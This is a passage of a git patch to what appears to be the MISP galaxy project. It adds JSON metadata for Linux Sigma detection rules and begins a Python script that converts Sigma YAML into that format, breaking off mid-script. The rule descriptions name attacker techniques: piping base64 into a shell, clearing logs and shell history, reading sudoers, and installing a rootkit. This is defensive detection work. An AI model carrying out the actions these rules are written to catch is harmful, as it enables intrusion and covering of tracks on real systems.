+ ], + "filename": "proc_creation_lnx_omigod_scx_runasprovider_executescript.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/pull/3059", + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" + ] + }, + "uuid": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", + "value": "OMIGOD SCX RunAsProvider ExecuteScript" + }, + { + "description": "Detects suspicious process command line that uses base64 encoded input for execution with a shell", + "meta": { + "author": "pH-T", + "creation_date": "2022/07/26", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_base64_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/arget13/DDexec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ] + }, + "uuid": "ba592c6d-6888-43c3-b8c6-689b8fe47337", + "value": "Linux Base64 Encoded Pipe to Shell" + }, + { + "description": "Detects attempts to clear logs on the system. 
Adversaries may clear system logs to hide evidence of an intrusion", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_clear_logs.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.002" + ] + }, + "uuid": "80915f59-9b56-4616-9de0-fd0dea6c12fe", + "value": "Clear Linux Logs" + }, + { + "description": "Detects execution of the \"groupdel\" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks", + "meta": { + "author": "Tuan Le (NCSGroup)", + "creation_date": "2022/12/26", + "falsepositive": [ + "Legitimate administrator activities" + ], + "filename": "proc_creation_lnx_groupdel.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://linuxize.com/post/how-to-delete-group-in-linux/", + "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", + "https://linux.die.net/man/8/groupdel", + "https://www.cyberciti.biz/faq/linux-remove-user-command/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_groupdel.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ] + }, + "uuid": "8a46f16c-8c4c-82d1-b121-0fdd3ba70a84", + "value": "Group Has Been Deleted Via Groupdel" + }, + { + "description": "Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": 
"2022/09/15", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_base64_shebang_cli.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS", + "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ] + }, + "uuid": "fe2f9663-41cb-47e2-b954-8a228f3b9dff", + "value": "Linux Base64 Encoded Shebang In CLI" + }, + { + "description": "Detects usage of \"getcap\" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_capa_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", + "https://github.com/carlospolop/PEASS-ng", + "https://github.com/diego-treitos/linux-smart-enumeration", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "d8d97d51-122d-4cdd-9e2f-01b4b4933530", + "value": "Capabilities Discovery - Linux" + }, + { + "description": "Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/14", + "falsepositive": [ + "Legitimate software that uses these patterns" + ], + "filename": "proc_creation_lnx_susp_pipe_shell.yml", + "level": "medium", + 
"logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ] + }, + "uuid": "880973f3-9708-491c-a77b-2a35a1921158", + "value": "Linux Shell Pipe to Shell" + }, + { + "description": "Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "filename": "proc_creation_lnx_curl_usage.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "ea34fb97-e2c4-4afb-810f-785e4459b194", + "value": "Curl Usage on Linux" + }, + { + "description": "Detects enumeration of local or remote network services.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/21", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_network_service_scanning.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + 
] + }, + "uuid": "3e102cd9-a70d-4a7a-9508-403963092f31", + "value": "Linux Network Service Scanning" + }, + { + "description": "Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_services_stop_and_disable.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "de25eeb8-3655-4643-ac3a-b662d3f26b6b", + "value": "Disable Or Stop Services" + }, + { + "description": "Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks", + "meta": { + "author": "Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Log rotation." 
+ ], + "filename": "proc_creation_lnx_clear_syslog.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.002" + ] + }, + "uuid": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", + "value": "Commands to Clear or Remove the Syslog" + }, + { + "description": "Detects java process spawning suspicious children", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_susp_java_children.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.tecmint.com/different-types-of-linux-shells/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "d292e0af-9a18-420c-9525-ec0ac3936892", + "value": "Suspicious Java Children Processes" + }, + { + "description": "Detects process discovery commands. 
Adversaries may attempt to get information about running processes on a system.\nInformation obtained could be used to gain an understanding of common software/applications running on systems within the network\n", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_process_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1057" + ] + }, + "uuid": "4e2f5868-08d4-413d-899f-dc2f1508627b", + "value": "Process Discovery" + }, + { + "description": "Detects usage of the 'chattr' utility to remove immutable file attribute.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Administrator interacting with immutable files (e.g. for instance backups)." 
+ ], + "filename": "proc_creation_lnx_chattr_immutable_removal.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ] + }, + "uuid": "34979410-e4b5-4e5d-8cfb-389fdff05c12", + "value": "Remove Immutable File Attribute" + }, + { + "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/10/15", + "falsepositive": [ + "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." 
+ ], + "filename": "proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/pull/3059", + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" + ] + }, + "uuid": "21541900-27a9-4454-9c4c-3f0a4240344a", + "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand" + }, + { + "description": "Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/06", + "falsepositive": [ + "Administrators or installed processes that leverage nohup" + ], + "filename": "proc_creation_lnx_nohup.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://gtfobins.github.io/gtfobins/nohup/", + "https://www.computerhope.com/unix/unohup.htm", + "https://en.wikipedia.org/wiki/Nohup", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml" + ], + "tags": "No established tags" + }, + "uuid": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2", + "value": "Nohup Execution" + }, + { + "description": "Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/05", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": 
"proc_creation_lnx_install_root_certificate.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ] + }, + "uuid": "78a80655-a51e-4669-bc6b-e9d206a462ee", + "value": "Install Root Certificate" + }, + { + "description": "Detects usage of the 'crontab' utility to remove the current crontab.\nThis is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_crontab_removal.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "c2e234de-03a3-41e1-b39a-1e56dc17ba67", + "value": "Remove Scheduled Cron Task/Job" + }, + { + "description": "Detects setting proxy configuration", + "meta": { + "author": "Ömer Günal", + "creation_date": "2020/06/17", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_proxy_connection.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1090/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1090" + ] + }, + "uuid": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c", + "value": "Connection Proxy" + }, + { + "description": "Detects known hacktool execution based on image name", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_hack_tools.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_hack_tools.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "a015e032-146d-4717-8944-7a1884122111", + "value": "HackTool Execution" + }, + { + "description": "Detects file deletion using \"rm\", \"shred\" or \"unlink\" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_file_deletion.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", + "value": "File Deletion" + }, + { + "description": "Detects the doas tool execution in linux host platform. 
This utility tool allow standard users to perform tasks as root, the same way sudo does.", + "meta": { + "author": "Sittikorn S, Teoderick Contreras", + "creation_date": "2022/01/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_lnx_doas_execution.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://research.splunk.com/endpoint/linux_doas_tool_execution/", + "https://www.makeuseof.com/how-to-install-and-use-doas/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "067d8238-7127-451c-a9ec-fa78045b618b", + "value": "Linux Doas Tool Execution" + }, + { + "description": "Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_susp_history_delete.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565.001" + ] + }, + "uuid": "1182f3b3-e716-4efa-99ab-d2685d04360f", + "value": "History File Deletion" + }, + { + "description": "Detects the execution of a cat /etc/sudoers to list all users that have sudo rights", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": 
"proc_creation_lnx_cat_sudoers.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/sleventyeleven/linuxprivchecker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1592.004" + ] + }, + "uuid": "0f79c4d2-4e1f-4683-9c36-b5469a665e06", + "value": "Cat Sudoers" + }, + { + "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_lnx_susp_git_clone.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1593.003" + ] + }, + "uuid": "cfec9d29-64ec-4a0f-9ffe-0fdb856d5446", + "value": "Suspicious Git Clone - Linux" + }, + { + "description": "Detects suspicious change of file privileges with chown and chmod commands", + "meta": { + "author": "Ömer Günal", + "creation_date": "2020/06/16", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_setgid_setuid.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", + "https://attack.mitre.org/techniques/T1548/001/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "c21c4eaa-ba2e-419a-92b2-8371703cbe21", + "value": "Setuid and Setgid" + }, + { + "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", + "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", + "https://github.com/apache/spark/pull/36315/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2022.33891" + ] + }, + "uuid": "c8a5f584-cdc8-42cc-8cce-0398e4265de3", + "value": "Apache Spark Shell Command Injection - ProcessCreation" + }, + { + "description": "Detects enumeration of local system groups. 
Adversaries may attempt to find local system groups and permission settings", + "meta": { + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/11", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_local_groups.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_groups.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "676381a6-15ca-4d73-a9c8-6a22e970b90d", + "value": "Local Groups Discovery - Linux" + }, + { + "description": "Detects usage of the \"usermod\" binary to add users add users to the root or suoders groups", + "meta": { + "author": "TuanLe (GTSC)", + "creation_date": "2022/12/21", + "falsepositive": [ + "Legitimate administrator activities" + ], + "filename": "proc_creation_lnx_usermod_susp_group.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/", + "https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence" + ] + }, + "uuid": "6a50f16c-3b7b-42d1-b081-0fdd3ba70a73", + "value": "User Added To Root/Sudoers Group Using Usermod" + }, + { + "description": "Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/05", + "falsepositive": [ + 
"Unlikely" + ], + "filename": "proc_creation_lnx_triple_cross_rootkit_install.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1014" + ] + }, + "uuid": "22236d75-d5a0-4287-bf06-c93b1770860f", + "value": "Triple Cross eBPF Rootkit Install Commands" + }, + { + "description": "Detects usage of system utilities (only grep and egrep for now) to discover security software discovery", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_lnx_security_software_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ] + }, + "uuid": "c9d8b7fd-78e4-44fe-88f6-599135d46d60", + "value": "Security Software Discovery - Linux" } ], "version": 1 From 1c8880b3bbc516f0c13733f283f42a56c2677556 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Fri, 6 Jan 2023 16:00:37 +0100 Subject: [PATCH 07/13] new: [tools] Sigma export tool added based on https://github.com/jstnk9/MISP/pull/1 --- tools/sigma/sigma-to-galaxy.py | 219 +++++++++++++++++++++++++++++++++ tools/sigma/update.sh | 5 + 2 files changed, 224 insertions(+) create mode 100644 tools/sigma/sigma-to-galaxy.py create mode 100644 tools/sigma/update.sh 
diff --git a/tools/sigma/sigma-to-galaxy.py b/tools/sigma/sigma-to-galaxy.py
new file mode 100644
index 0000000..cde7a57
--- /dev/null
+++ b/tools/sigma/sigma-to-galaxy.py
@@ -0,0 +1,219 @@ +""" + + Author: Jose Luis Sanchez Martinez + Twitter: @Joseliyo_Jstnk + date: 2022/11/18 + Modified: 2022/12/05 + GitHub: https://github.com/jstnk9/MISP + Description: This script can create MISP Galaxies from Sigma Rules. It can be done setting the path + where you have stored your sigma rules in the system. + Examples: python sigma-to-galaxy -p "C:\lab\sigma\rules\" -r + MISP Galaxy: https://github.com/MISP/misp-galaxy + +""" + +import os, json, yaml, argparse, uuid + +unique_uuid = '9cf7cd2e-d5f1-48c4-9909-7896ba1c96b2' + + +def main(args): + uuidGalaxy = create_galaxy_json() + galaxyCluster = create_cluster(uuidGalaxy=unique_uuid) + valuesData = create_cluster_value(args.inputPath, args.recursive, galaxyCluster) + galaxyCluster["values"].extend(valuesData) + create_cluster_json(galaxyCluster) + check_duplicates(galaxyCluster) + + +def check_duplicates(galaxy): + """ + :param galaxy: Content of the cluster with all the values + + :return res: + """ + galaxiesObj = {} + for val in galaxy["values"]: + obj = {} + if galaxiesObj.get(val["value"]): + galaxiesObj[val["value"]].append(val["uuid"]) + else: + galaxiesObj[val["value"]] = [] + galaxiesObj[val["value"]].append(val["uuid"]) + + for k, v in galaxiesObj.items(): + if len(v) > 1: + print("[*] Title duplicated: %s " % (k)) + for ids in v: + print(" %s" % (ids)) + + +def create_cluster_json(galaxyCluster): + """ + :param galaxyCluster: Content of the cluster with all the values related to the Sigma Rules + + This function finally creates the sigma-cluster.json file with all the information. + """ + with open("sigma-cluster.json", "w") as f: + json.dump(galaxyCluster, f) + + +def parseYaml(inputPath, yamlFile): + """ + :param inputPath: Path where is stored the Sigma Rule to parse. + :param yamlFile: Content of the Sigma Rule. + + This function can convert a Sigma Rule to JSON (dict) + + :return jsonData: Sigma rule converted to dict. 
+ """ + fullPath = os.path.join(inputPath, yamlFile) + with open(fullPath, encoding='utf-8') as f: + jsonData = yaml.load(f, Loader=yaml.FullLoader) + return jsonData + + +def create_cluster(uuidGalaxy=unique_uuid): + """ + :param uuidGalaxy: Is the uuid4 generated for the galaxy JSON file previously. + + This function creates the JSON file of the path /app/files/misp-galaxy/clusters without values. + + :return cluster: Dict with the basic information needed for the JSON file. + """ + cluster = { + "authors": ["@Joseliyo_Jstnk"], + "category": "rules", + "description": "MISP galaxy cluster based on Sigma Rules.", + "name": "Sigma-Rules", + "source": "https://github.com/jstnk9/MISP/tree/main/misp-galaxy/sigma", + "type": "sigma-rules", + "uuid": uuidGalaxy, + "values": [], + "version": 1, + } + + return cluster + + +def create_cluster_value(pathsigma, recursive, galaxyCluster): + """ + :param pathsigma: Is the path established with the -p parameter + :param recurisve: If true, it can recursively navigate through every subfolder of :pathsigma: + :param galaxyCluster: Dictionary with the information needed for the cluster JSON file + + This function makes a loop in every subfolder to identify Sigma Rules and after that.. + 1. It parse the YAML file to dict + 2. Once it's a dict, it call the function to parse the dict and start creating the + values of the cluster + + IMPORTANT: Sigma rules must ends with .yml and not .yaml + + :return valuesData: Array with every Sigma Rule parsed into a dict. 
+ """ + valuesData = [] + if recursive == True: + for dirpath, dirs, files in os.walk(pathsigma): + if os.name == 'nt': + path = dirpath.split('/')[0] + else: + path = dirpath + + for f in files: + if f.endswith(".yml"): + jsonData = parseYaml(path, f) + valuesData.append( + parse_sigma_to_cluster(jsonData, f, path.split("rules")[1]) + ) + + return valuesData + + +def parse_sigma_to_cluster(jsonData, sigmaFile, sigmaPath): + """ + :param jsonData: Is the Sigma Rule parsed to dict. + :param sigmaFile: Is the Sigma Rule filename. + :param sigmaPath: Is the path where are stored the Sigma Rules. + + This function parse the dict of the Sigma Rule to fill all the fields needed for the MISP Galaxy. + + :return valueData: Dict with all the fields filled ready to be added in the cluster JSON file. + + """ + valueData = {} + valueData["description"] = jsonData.get("description", "No established description") + valueData["uuid"] = jsonData.get("id", "No established id") + valueData["value"] = jsonData.get("title", "No established title") + valueData["meta"] = {} + valueData["meta"]["refs"] = [] + if jsonData.get("references"): + for rf in jsonData.get("references"): + valueData["meta"]["refs"].append(rf) + valueData["meta"]["refs"] = [ + *set(valueData["meta"]["refs"]) + ] # Removing duplicated references + valueData["meta"]["tags"] = jsonData.get("tags", "No established tags") + valueData["meta"]["creation_date"] = jsonData.get("date", "No established date") + valueData["meta"]["filename"] = sigmaFile + valueData["meta"]["author"] = jsonData.get("author", "No established author") + valueData["meta"]["level"] = jsonData.get("level", "No established level") + valueData["meta"]["falsepositive"] = jsonData.get( + "falsepositives", "No established falsepositives" + ) + valueData["meta"]["refs"].append( + "https://github.com/SigmaHQ/sigma/tree/master/rules%s/%s" + % (sigmaPath.replace("\\", "/"), sigmaFile) + ) # this value only works if you set the path like it was cloned from 
